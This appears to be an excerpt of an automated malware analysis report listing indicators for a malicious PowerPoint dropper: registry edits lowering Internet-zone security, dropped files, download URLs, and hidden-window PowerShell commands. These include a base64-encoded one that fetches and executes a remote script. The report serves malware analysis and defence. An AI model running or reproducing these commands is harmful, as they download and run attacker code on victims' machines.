Technical Information
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
- %APPDATA%\ssdf.pptx
- %APPDATA%\~$ssdf.pptx
- %APPDATA%\blues.exe
- '19#.#3.191.248':7287
- http://19#.##.191.248:7287/ssdf.pptx via 19#.#3.191.248
- http://19#.##.191.248:7287/blues.exe via 19#.#3.191.248
- '%APPDATA%\blues.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function ZGCQJsGaOFI($vVjyIilIF, $VmMLSN){[IO.File]::WriteAllBytes($vVjyIilIF, $VmMLSN)};function erSOFPpidIxnjgFJ($vVjyIilIF){if($vVjyIilIF.EndsWith((GNwhHTDjfs @...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\powerpnt.exe' "%APPDATA%\ssdf.pptx"
- '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAOQA0AC4AMwAzAC4AMQA5ADEALgAyADQAOAA6ADcAMgA4ADcALwBzAHkAcwAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIAB...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -w hidden -e aQB3AHIAIABoAHQAdABwADoALwAvADEAOQA0AC4AMwAzAC4AMQA5ADEALgAyADQAOAA6ADcAMgA4ADcALwBzAHkAcwAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAHwAIABpAGUAeAA=